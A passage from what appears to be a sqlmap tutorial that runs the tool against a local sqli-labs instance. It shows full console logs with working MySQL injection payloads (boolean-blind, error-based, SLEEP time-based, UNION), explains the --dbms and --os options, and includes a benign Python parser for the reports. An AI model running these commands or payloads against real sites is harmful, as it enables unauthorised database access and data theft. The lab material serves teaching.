[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:37:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:37:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:37:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:37:50] [INFO] target URL appears to have 3 columns in query
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[20:38:00] [INFO] testing if GET parameter 'id' is dynamic
[20:38:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:38:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:38:01] [INFO] testing for SQL injection on GET parameter 'id'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:01] [INFO] testing 'Generic inline queries'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:38:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:38:06] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:08] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:16] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[20:38:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[20:38:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:50] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[20:38:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:38:53] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[20:38:54] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:38:55] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[20:38:56] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:38:57] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:38:58] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:01] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[20:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:39:23] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:39:32] [WARNING] GET parameter 'id' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3431 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 3447=3447 AND 'KGyg'='KGyg

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=admin' AND (SELECT 3589 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(3589=3589,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xcai'='xcai

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 2216 FROM (SELECT(SLEEP(5)))rUMt) AND 'oohs'='oohs

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: uname=-9826' UNION ALL SELECT CONCAT(0x717a6b6a71,0x5251674f4156424d73766576455768497757664846575255634647565852644255516a63674d4256,0x7171787071),NULL,NULL-- -
---
[20:39:32] [INFO] the back-end DBMS is MySQL
[20:39:32] [INFO] fetching banner
[20:39:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:39:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:39:32 /2020-02-29/


The * marker can also be used in parameters such as --user-agent and --proxy.

IV. sqlmap injection parameters

1. Forcing the DBMS in sqlmap

By default sqlmap automatically detects the back-end database management system (DBMS) of the target web application. The DBMS types sqlmap supports are:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • Firebird
  • SQLite
  • Sybase
  • SAP MaxDB
  • DB2

The database can be specified with a parameter so that only tests for that DBMS are run:
Parameter:
--dbms <DBMS type>
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --banner

Output:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:40:41 /2020-03-01/

[09:40:42] [INFO] testing connection to the target URL
[09:40:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:40:42] [INFO] testing if the target URL content is stable
[09:40:42] [INFO] target URL content is stable
[09:40:42] [INFO] testing if GET parameter 'id' is dynamic
[09:40:42] [INFO] GET parameter 'id' appears to be dynamic
[09:40:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:40:42] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[09:40:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:40:51] [WARNING] reflective value(s) found and filtering out
[09:40:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:40:51] [INFO] testing 'Generic inline queries'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:40:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:40:52] [INFO] testing 'MySQL inline queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:40:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:41:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:41:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:41:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:41:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:41:02] [INFO] target URL appears to have 3 columns in query
[09:41:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:41:21] [INFO] the back-end DBMS is MySQL
[09:41:21] [INFO] fetching banner
[09:41:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:41:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 09:41:21 /2020-03-01/

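The report block between the two `---` lines has the same shape in every run shown on this page, so it is worth being able to read it by machine. The following is an added example written for this post, not code from the original article or from sqlmap: it parses that block into structured records, extracts the request total from the "sqlmap identified ..." line, and summarises the techniques found per parameter. The sample report embedded in it is copied from the `--dbms mysql` run above; the dataclass and function names are this example's own.

```python
"""Parse the injection-point report that sqlmap prints between the '---' lines.

Added example for this post; not code from the original article or from sqlmap.
Dataclass and function names are this example's own. SAMPLE_REPORT is copied
from the --dbms mysql run shown above.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "Parameter: id (GET)" or "Parameter: Cookie #1* ((custom) HEADER)"
PARAM_RE = re.compile(r"^Parameter:\s+(?P<name>.+?)\s+\((?P<place>.+)\)\s*$")
# The indented key/value lines of one vector; "Vector:" only appears at higher -v levels.
KV_RE = re.compile(r"^(Type|Title|Payload|Vector):\s*(.*)$")
REQUESTS_RE = re.compile(r"total of (\d+) HTTP\(s\) requests")


@dataclass
class InjectionVector:
    type: str
    title: str
    payload: str
    vector: str = ""


@dataclass
class InjectionPoint:
    parameter: str
    place: str
    vectors: List[InjectionVector] = field(default_factory=list)


def _flush(point: Optional[InjectionPoint], fields: Dict[str, str]) -> None:
    """Turn the key/value lines collected so far into a vector on the current point."""
    if point is not None and fields:
        point.vectors.append(InjectionVector(
            fields.get("Type", ""), fields.get("Title", ""),
            fields.get("Payload", ""), fields.get("Vector", ""),
        ))
    fields.clear()


def parse_report(text: str) -> List[InjectionPoint]:
    """Parse sqlmap console output into one InjectionPoint per 'Parameter:' block."""
    points: List[InjectionPoint] = []
    current: Optional[InjectionPoint] = None
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = PARAM_RE.match(line)
        if m:
            _flush(current, fields)
            current = InjectionPoint(m.group("name"), m.group("place"))
            points.append(current)
            continue
        kv = KV_RE.match(line)
        if kv and current is not None:
            if kv.group(1) == "Type":      # each vector starts with its Type line
                _flush(current, fields)
            fields[kv.group(1)] = kv.group(2).strip()
        else:                              # blank line, '---' or a log line ends the vector
            _flush(current, fields)
    _flush(current, fields)
    return points


def request_count(text: str) -> Optional[int]:
    """Total HTTP requests sqlmap reports for the run, if the summary line is present."""
    m = REQUESTS_RE.search(text)
    return int(m.group(1)) if m else None


def techniques_by_parameter(points: List[InjectionPoint]) -> Dict[str, List[str]]:
    """Map 'name (place)' to the list of technique types found for it."""
    return {f"{p.parameter} ({p.place})": [v.type for v in p.vectors] for p in points}


SAMPLE_REPORT = """\
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:41:21] [INFO] the back-end DBMS is MySQL
"""

if __name__ == "__main__":
    points = parse_report(SAMPLE_REPORT)
    print("requests:", request_count(SAMPLE_REPORT))
    for name, types in techniques_by_parameter(points).items():
        print(name, "->", ", ".join(types))
```

Run stand-alone it prints the request total and one line per parameter with its technique list. Recording `request_count` per run is a cheap way to compare configurations: the two totals on this page (3431 for the cookie-header run at the top of this section, 50 for the `--dbms mysql` run) differ by almost two orders of magnitude.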

2. Forcing the operating system in sqlmap

By default sqlmap automatically detects the back-end operating system of the target web application; the OS types it fully supports are Linux and Windows.
The operating system to probe for can be specified with a parameter:
Parameter:
--os <OS type>
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --os windows --banner

Output:

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:42:55 /2020-03-01/

[09:42:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:42:56] [INFO] testing MySQL
[09:42:56] [INFO] confirming MySQL
[09:42:56] [INFO] the back-end DBMS is MySQL
[09:42:56] [INFO] fetching banner
[09:42:56] [INFO] the back-end DBMS operating system is Windows
back-end DBMS operating system: Windows
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.26'
[09:42:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 09:42:56 /2020-03-01/

Test again:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os linux --banner

Output:

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:45:48 /2020-03-01/

[09:45:48] [INFO] testing connection to the target URL
[09:45:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:45:48] [INFO] testing if the target URL content is stable
[09:45:49] [INFO] target URL content is stable
[09:45:49] [INFO] testing if GET parameter 'id' is dynamic
[09:45:49] [INFO] GET parameter 'id' appears to be dynamic
[09:45:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:45:49] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:45:49] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[09:45:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:45:51] [WARNING] reflective value(s) found and filtering out
[09:45:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:45:51] [INFO] testing 'Generic inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:45:52] [INFO] testing 'MySQL inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:45:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:46:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:46:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:46:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:46:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:46:02] [INFO] target URL appears to have 3 columns in query
[09:46:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8697=8697 AND 'vXiI'='vXiI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(4143=4143,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vpOq'='vpOq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4595 FROM (SELECT(SLEEP(5)))gWzN) AND 'BTap'='BTap

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6582' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x4f4152547367744d454144444f7859484d52646f6e49564467667458597843725466574363435a6d,0x71767a7a71),NULL-- -
---
[09:46:06] [INFO] the back-end DBMS is MySQL
[09:46:06] [INFO] fetching banner
[09:46:07] [INFO] the back-end DBMS operating system is Linux
[09:46:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
